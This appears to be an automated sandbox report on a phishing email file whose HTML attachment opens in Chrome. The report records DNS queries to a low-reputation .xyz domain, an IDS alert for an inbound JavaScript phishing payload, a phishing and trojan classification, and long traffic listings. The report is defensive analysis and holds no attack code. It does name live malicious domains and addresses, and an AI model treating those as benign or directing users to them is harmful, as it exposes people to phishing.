            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.23.209.148:443 -> 192.168.2.17:49765 version: TLS 1.2
            Source: chrome.exeMemory has grown: Private usage: 1MB later: 32MB

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2857090 ETPRO CURRENT_EVENTS JS/PsyduckPockeball Payload Inbound 51.38.145.13:443 -> 192.168.2.17:49720
            Performs DNS queries to domains with low reputation
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: a14bf615-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: a14bf615-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: l1ve.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: l1ve.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 371098e6-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 371098e6-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 78d704d5-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 78d704d5-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 78d704d5-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 78d704d5-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: global trafficDNS traffic detected: DNS query: online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: a14bf615-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: l1ve.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: 371098e6-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: 288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: 2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: 78d704d5-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.17:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.17:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.23.209.148:443 -> 192.168.2.17:49765 version: TLS 1.2
            Source: classification engineClassification label: mal68.phis.troj.winMSG@20/67@28/148
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240702T1421470122-3964.etl
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\44zg1cvu.msg"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "94A4268F-64A9-402B-9D26-050228D3257E" "68CA683E-662B-479C-A333-B79E6B1D0F4B" "3964" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RKD4N0TN\LLZ-950309.htm
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1968,i,10276406539543630318,17323566579801720130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4616 --field-trial-handle=1968,i,10276406539543630318,17323566579801720130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "94A4268F-64A9-402B-9D26-050228D3257E" "68CA683E-662B-479C-A333-B79E6B1D0F4B" "3964" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RKD4N0TN\LLZ-950309.htm
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1968,i,10276406539543630318,17323566579801720130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
